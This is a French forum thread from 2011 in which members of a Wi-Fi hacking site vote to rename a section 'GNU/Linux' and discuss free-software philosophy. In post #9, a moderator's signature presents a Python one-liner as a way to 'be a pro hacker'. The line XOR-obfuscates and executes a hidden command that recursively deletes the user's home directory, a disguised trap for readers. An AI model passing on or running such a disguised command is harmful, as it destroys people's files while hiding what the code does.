Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 01-02-2011 18:58:38

noireaude
Membre d'honneur
Lieu : Chez le docteur
Site Web

Suggestion (nom de la rubrique)

Je ne veut pas faire l'empêcheur de tourner en rond mais je trouve important pour des raisons éthiques que l'on s'interroge sur le nom de la section.

"Linux en général" est bien, mais de mon point de vue il manque la moitié du titre, à savoir que GNU en est absent.

Je ne vais pas me lancer non plus dans un grand pavé et certains vont certainement me prendre un barbu intégriste au teeshirt crado, mais dire Linux ne rime à rien et n'éduque pas les utilisateurs.

On ne va pas non plus s'attarder sur le côté technique mais je trouve assez drôle que la plus part des gens qui disent utiliser Linux occultent le fait qu'ils n'en voient rien et que l'image visuelle qu'ils se font au quotidien de leur système est celle de GNU.

Le noyau Linux (1991) provient de la vision de Mr L.Torvalds et on sait que Mr L.Torvalds à une vision de la liberté individuelle qui n'a rien à voir avec la philosophie originelle du projet GNU puisque lui même se dit prêt à utiliser un logiciel privateur pour peu qu'il soit commode et donc renoncer de ce fait à sa propre liberté.

Cela ne veut pas dire pour autant qu'il n'a pas de mérite, certains diront qu'il est juste pragmatique, je le pense aussi, je pense aussi que c'est son droit.

Mais la philosophie du logiciel libre découle à la base aussi d'une idéologie basée sur le partage et la transmission du savoir, la liberté d'utilisation, la protection des libertés individuelles et la protection du droit humain.

Cette philosophie découle du projet GNU (1983), bien antérieur à Linux  et découle de la vision de Mr R.Stallman qui se décarcasse au quotidien et de façon inconditionnelle pour que les gens n'oublient pas l'essence même du projet.

Alors bien que cela ne soit pas fondamentalement important pour la majeur partie des utilisateurs, rendez à César ce qui est à César, respectez le travail de la FSF et de Mr Stallman et renommez s'il vous plait messieurs, cette section de son nom complet et légitime.

A savoir : "GNU/Linux en général" ou "GNU et Linux en général".

Imaginez un instant, Igor sans Grichka Bogdannof, Laurel sans Hardy, Tic sans tac, la chaussette droite sans la gauche, ça ne serait pas pareil !!!!

Linux sans Gnu non plus !!!

Si mes considérations ne sont pas prises en compte j'en appellerai au soulèvement au sein de la jante (gent) bovine et gnoutèsque, j'entamerai une grève de la faim (entre les repas) et je pondrais un pavé par jour afin de faire valoir nos (vos) droits à la considération. !!!

Moo !!!

(ouff j'ai frôlé le pavé la)

Gnu.tux-1600x800.png

affiche-utopia.jpg

REVOLUciON !!!!!  (avec l'accent Espagnol bien sur) (et Olé !!!)

Dernière modification par noireaude (02-02-2011 01:28:21)

L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 01-02-2011 19:35:07

faptiem
Membre Indéboulonnable

Re : Suggestion (nom de la rubrique)

Mais quel emmerdeur celui là.. big_smile

Mais je suis d'accord j'ai du me dire au moins 20 fois que le nom devrait être "GNU/Linux en général" tongue

#3 01-02-2011 22:03:43

M1ck3y
Administrateur
Lieu : Lost in the darkness

noireaude a écrit :

Si mes considérations ne sont pas prises en compte j'en appellerai au soulèvement au sien de la jante bovine et gnoutèsque, j'entamerai une grève de la faim (entre les repas) et je pondrais un pavé par jour afin de faire valoir nos (vos) droits à la considération. !!!

Moo !!!

Un pavé par jour, moi je suis d'accord smile

Bon, plus sérieusement, quand on a créé cette section c'était à l'origine parce qu'on avait une section plus généraliste qui regroupait des sujets traitant de Backtrack, de pentest, de commandes Linux en tous genres, de quelques tools sous win également, et quand tu ajoutes un peu de wifi là dedans on se retrouve avec un beau bordel... Donc on a du scinder cette section en plusieurs forums distincts et faire du tri afin d'obtenir un forum plus clair, ce qui est un progrès pour tous les utilisateurs du forum. Il est vrai qu'on ne s'est pas franchement pris la tete en ce qui concerne le nom de la section, le but étant avant tout de mieux réorganiser le forum. Le terme "Linux" est un abus de langage qui regroupe bien évidemment tout l'univers des distributions GNU / Linux (qui ne sont pas toutes totalement libres d'ailleurs, mais c'est un autre sujet).

Je suis tout à fait ouvert à une modification du nom de cette section du forum, et je pense qu'un vote s'impose. Alors etes vous pour ou contre une modification du nom de cette section:

Nom actuel
-Linux en général

Nouveau nom
-GNU / Linux en général

Pour l'instant on a deux voix pour, j'attend que davantage d'avis se soient exprimés et la majorité l'emportera smile

#4 01-02-2011 22:17:17

koala
Membre d'honneur
Lieu : In the sky

GNU / linux en général yeahanim

#5 01-02-2011 22:28:02

antares145
Membre d'honneur
Site Web

Je suis tenté de différer mon vote, le temps d'avoir quelques pavés quotidiens pour occuper les longues soirées d'hiver (en plus ça caille sévère et on est bien chez soi) smile

Bon, allez, je vote pour, en ces temps troublés de manifestations partout dans le monde (nord-africain, surtout) il vaut mieux ne pas provoquer l'ire de la "jante bovine et gnoutèsque" big_smile
Plus sérieusement, je ne vois pas quelle objection on pourrait avoir... C'est un détail, certes, mais légitime. Par contre je préfère "GNU/Linux" à "GNU et linux", parce que le jour où quelqu'un débarque avec des questions sur Hurd GNU Hurd on fera pas les malins tongue

PS : au passage, ça s'écrit gent et pas jante, une jante c'est ce qui traine dans ta prairie après qu'une bagnole se prenne un (gros !) trou wink
PPS : avec l'accent espagnol ça s'écrit "Revolucíon !!" (olé !)
PPPS : <troll>Accessoirement, on dit tout le temps "Windows" et pas "MS Windows", même combat </troll> (je suis déjà loin !)

#6 01-02-2011 22:55:48

konik
Membre d'Or
Lieu : 127.0.0.1

+1 "GNU/Linux"  smile

$! \/0(_)$ |*0uv32 1!r3 [3c!, c'357 q(_)3 v0(_)$ 4v32 vr4!|\/|3n7 83$0!n d3 |\|!qu3r

#7 02-02-2011 00:51:33

noireaude
Membre d'honneur
Site Web

faptiem
"Mais quel emmerdeur celui là..:)"

Je prend très au sérieux mon rôle de trublion.

tongue

M1ck3y
"Le terme "Linux" est un abus de langage qui regroupe bien évidemment tout l'univers des distributions GNU / Linux (qui ne sont pas toutes totalement libres d'ailleurs, mais c'est un autre sujet)."

Entièrement d'accord pour le terme abus de language, après il est vrai et je suis content que tu mettes l'accent la dessus que certaines distributions Gnu/linux ne sont pas totalement libres, drivers, flash, java étant déjà présents à l'installation.

J'avoue néanmoins qu'il est difficile de se passer totalement de certains des ces logiciels et je comprend que les gens les utilisent moi le premier, même si je n'en suis pas très fier.
Je me console en me disant qu'il y a bien des croyants non pratiquants roll, en me disant que l'homme euh la vache est faible et que surtout mes parties d'écheques en ligne sur des sites utilisant javascript me manqueraient trop...

Je me permet d'ajouter une précision pour en revenir à ta remarque, car beaucoup ne le savent pas, que le noyau linux lui même n'est pas entièrement libre et contient des portions de code non libres déguisées en code source en plus des applications que j'ai cité plus haut.

Pour les puristes qui voudraient un Os totalement libre il existe des distributions comme gNewsense issue d'une rencontre entre R.Stallman et M.Shuttleworth ou Ututo (nom d'un petit lézard d'Argentine) totalement libres noyau compris, mais elles ne sont malheureusement pas très populaires.
Bon à savoir aussi, quand Mr Torvalds publie une nouvelle version du noyau Linux, la communauté Gnu publie la même version peu de temps après épurée de ces portions non libres.

Les curieux peuvent aller faire un tour sur gnu.org ou sur le site de la free software foundation pour en savoir un peu plus.

antares145
PS : au passage, ça s'écrit gent et pas jante, une jante c'est ce qui traine dans ta prairie après qu'une bagnole se prenne un (gros !) trou
PPS : avec l'accent espagnol ça s'écrit "Revolucíon !!" (olé !)
PPPS : <troll>Accessoirement, on dit tout le temps "Windows" et pas "MS Windows", même combat </troll> (je suis déjà loin !)

Merci pour ces précisions ortographiques (j'avais un doute mais j'ai eu la flème de vérifier smile)
Par contre je m'en veut d'avoir oublié le Olé !!!

Pour Ms Windows je suis d'accord, ils ont le droit à la même considération (tu peux revenir smile)

Pour Hurd, je crois bien que cela ressemble fort à une Utopie et qu'on est pas près d'être embêté avec ça. (la c'est le pessimiste qui parle).
Néanmoins ta remarque à son importance car il y a aussi les BSD qui utilisent Gnu, je ne voudrais pas fâcher les adeptes smile.

Sinon comme ça, en passant, mine de rien j'ai le droit de vote ? hi hi ok ---->

Dernière modification par noireaude (02-02-2011 01:50:53)

L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

#8 02-02-2011 20:53:08

M1ck3y
Administrateur
Lieu : Lost in the darkness

noireaude a écrit :

Je me permet d'ajouter une précision pour en revenir à ta remarque, car beaucoup ne le savent pas, que le noyau linux lui même n'est pas entièrement libre et contient des portions de code non libres déguisées en code source en plus des applications que j'ai cité plus haut.

C'est à ça que je pensais quand je parlais de distris qui ne sont pas totalement libres, puisqu'elles utilisent un kernel qui contient du code non libre.

Bon je pense que les votes sont assez explicites, et c'est donc à l'unanimité que le nouveau nom de la section a été approuvé, je m'en vais le modifier de ce pas smile

PS: Gnous, vaches, meme combat non? Serait ce là les prémices d'un mouvement syndicaliste bovin visant à rassembler l'espèce afin de mener à bien une grande révolte? tongue

#9 02-02-2011 23:18:02

spawn
Modérateur

smile je followe comme diraient nos amis gazouilleurs.
+1 pour GNU / Linux (qui a déja été changé.:P)

/ figure 1 : restes d'une boutade nulle qui a subi
###                          <-|                une suppression en règle à grands coups
       (fig 1)                     \               de lasers spartans.

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#10 03-02-2011 00:40:19

noireaude
Membre d'honneur
Site Web

M1ck3y a écrit :

Bon je pense que les votes sont assez explicites, et c'est donc à l'unanimité que le nouveau nom de la section a été approuvé, je m'en vais le modifier de ce pas smile

PS: Gnous, vaches, meme combat non? Serait ce là les prémices d'un mouvement syndicaliste bovin visant à rassembler l'espèce afin de mener à bien une grande révolte? tongue

Bon je peux recommencer à grignotter entre les repas alors smile, mais je reste vigilant !!!

Pour ce qui est du mouvement syndicaliste je suis contre, ils finissent toujours par se faire acheter et au final ils laissent les patrons nous emboucaner la vie (les boucs son exclus du mouvement smile).

Par contre rassembler la gente bovine, gnoutèsque et les mamifères en tout genre (les boucs aussi si ils passent sous la douche) afin de créer une société autonome pourquoi pas !!!

Mais ça c'est un autre sujet qui tient plus en effet du combat révolutionnaire non violent (par une désobéisance civile de masse, le boycotte de masse etc etc...) que du militantisme passif et qui tient surtout de l'utopie avouons le.

Mais je me ferais peut être un pavé la dessus un de ces 4 car on rigole, mais si les gens ne prennent pas consience que les banques, les groupes financiers et leur propre façon de consommer sont en train de nous envoyer droit dans le mur, nous même, nos (leur) enfants et petits enfants allons le payer très très cher et bien moins rigoler.
Et plutôt qu'on ne le pense.

Je met la philosophie du mouvement GNU en avant, car à mon avis elle nous donne un bon exemple de (la) d'(une) voie à suivre et ce bien audela du logiciel pour enrayer la folie de ces 1% de gens qui tiennent toutes les richesses du monde dans leur porte feuille d'actions et qui le mènent à sa perte sans qu'on se bouge.

Dernière modification par noireaude (03-02-2011 00:48:06)

#11 03-02-2011 00:48:45

koala
Membre d'honneur
Lieu : In the sky

Je met la philosophie du mouvement GNU en avant, car à mon avis elle nous donne un bon exemple de (la) d'(une) voie à suivre et ce bien audela du logiciel pour enrayer la folie de ces 1% de gens qui tiennent les richesses du monde et qui le mènent à sa perte sans qu'on se bouge.

plus_un

Annonce